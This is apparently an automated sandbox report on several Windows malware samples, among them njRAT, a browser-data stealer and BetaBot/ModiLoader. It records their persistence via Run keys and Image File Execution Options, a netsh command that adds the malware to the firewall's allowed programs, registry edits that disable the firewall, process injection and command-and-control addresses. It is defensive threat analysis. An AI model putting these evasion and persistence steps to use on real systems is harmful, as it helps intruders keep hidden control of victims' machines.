2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Njrat family

njrat

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6825da1e045502b22d4b02d4028214ab.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6825da1e045502b22d4b02d4028214ab.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6825da1e045502b22d4b02d4028214ab = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .." C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6825da1e045502b22d4b02d4028214ab = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .." C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2404 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 2404 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 2404 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\netsh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 101.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
TH 43.229.151.64:5552 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
TH 43.229.151.64:5552 tcp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
TH 43.229.151.64:5552 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
TH 43.229.151.64:5552 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
TH 43.229.151.64:5552 tcp
TH 43.229.151.64:5552 tcp
TH 43.229.151.64:5552 tcp

Files

memory/2404-0-0x00000000747F2000-0x00000000747F3000-memory.dmp

memory/2404-1-0x00000000747F0000-0x0000000074DA1000-memory.dmp

memory/2404-5-0x00000000747F2000-0x00000000747F3000-memory.dmp

memory/2404-6-0x00000000747F0000-0x0000000074DA1000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

154s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\vir1.xlsx"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\vir1.xlsx"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.109.69.13.in-addr.arpa udp

Files

memory/3628-9-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-14-0x00007FFBF40B0000-0x00007FFBF40C0000-memory.dmp

memory/3628-15-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-17-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-20-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-22-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-23-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-21-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-19-0x00007FFBF40B0000-0x00007FFBF40C0000-memory.dmp

memory/3628-18-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-16-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-13-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-12-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-11-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-10-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-8-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-7-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-6-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp

memory/3628-5-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-4-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp

memory/3628-3-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp

memory/3628-2-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp

memory/3628-1-0x00007FFBF6A10000-0x00007FFBF6A20000-memory.dmp

memory/3628-0-0x00007FFC36A2D000-0x00007FFC36A2E000-memory.dmp

memory/3628-37-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-36-0x00007FFC36A2D000-0x00007FFC36A2E000-memory.dmp

memory/3628-38-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

memory/3628-39-0x00007FFC36990000-0x00007FFC36B85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 a3d40cd6b1d8d8d967cce990c9d9b142
SHA1 4c6b928012262b9f4d8bd1685fe982623a00d484
SHA256 9408df4c41dc131f32be525e423f536b8f6b77bc4f1e488cc3ee6468a3ef0935
SHA512 3c6187c3ea71cf5fdd9573c30d03f8f315894d14993bdfb1891e1ef8c993372d28a485ca51f14c0db273c62cff856027239e70006bdecf0be0299010536a8a59

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\eupdate.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\6F4B627D74491845150070\\6F4B627D74491845150070.exe" C:\Users\Admin\AppData\Local\Temp\eupdate.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\eupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\eupdate.exe N/A

Modifies Internet Explorer Protected Mode

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe N/A

Modifies Internet Explorer Protected Mode Banner

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth = "0" C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3516 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Local\Temp\eupdate.exe
PID 3516 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Local\Temp\eupdate.exe
PID 3516 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Local\Temp\eupdate.exe
PID 3516 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Local\Temp\eupdate.exe
PID 3516 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Local\Temp\eupdate.exe
PID 3516 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Local\Temp\eupdate.exe
PID 3516 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Local\Temp\eupdate.exe
PID 3640 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 3640 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 3640 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\eupdate.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 2296 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 2296 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 2296 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 2296 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 2296 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 2296 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe
PID 2296 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe

Processes

C:\Users\Admin\AppData\Local\Temp\eupdate.exe

"C:\Users\Admin\AppData\Local\Temp\eupdate.exe"

C:\Users\Admin\AppData\Local\Temp\eupdate.exe

"eupdate.exe"

C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe

"C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe"

C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe

"6F4B627D74491845150070.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
RU 62.113.117.136:80 tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
RU 62.113.117.136:80 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp

Files

memory/3516-0-0x0000000074BE2000-0x0000000074BE3000-memory.dmp

memory/3516-1-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3516-2-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3640-5-0x0000000000400000-0x000000000040F000-memory.dmp

memory/3640-7-0x0000000000400000-0x000000000040F000-memory.dmp

memory/3640-4-0x0000000000400000-0x000000000040F000-memory.dmp

memory/3640-3-0x0000000000400000-0x000000000040F000-memory.dmp

memory/3516-13-0x0000000074BE0000-0x0000000075191000-memory.dmp

C:\Users\Admin\AppData\Roaming\6F4B627D74491845150070\6F4B627D74491845150070.exe

MD5 ccfaeed043685c189ef498c3c6f675e7
SHA1 6973b66e83db7f6d9ba957a6f9cca60a4983f0e8
SHA256 5d81fc6ab3e6c7bd353ee53297478fc10abfc7f851359f81a65dea74c70156ff
SHA512 ab8f2d33ec8300d87423f53243f45b720e27d59ab7839d7dcb9d37572c1f4e34536221bfda25dee939218475f44915cac2cf4e9270881af15f53d916bd9dc204

memory/2296-16-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/2296-17-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/1008-24-0x0000000000400000-0x000000000040F000-memory.dmp

memory/2296-25-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/2296-15-0x0000000074BE2000-0x0000000074BE3000-memory.dmp

memory/3640-12-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1008-26-0x0000000000400000-0x000000000040F000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe"

Signatures

BetaBot

trojan backdoor botnet betabot

Betabot family

betabot

ModiLoader, DBatLoader

trojan modiloader

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" C:\Windows\SysWOW64\explorer.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" C:\Windows\SysWOW64\explorer.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\explorer.exe N/A

Modiloader family

modiloader

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ai3owwq7y.exe C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ai3owwq7y.exe\DisableExceptionChainValidation C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe C:\Windows\SysWOW64\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "fzpxnnw.exe" C:\Windows\SysWOW64\explorer.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\ai3owwq7y.exe" C:\Windows\SysWOW64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\ai3owwq7y.exe\"" C:\Windows\SysWOW64\explorer.exe N/A

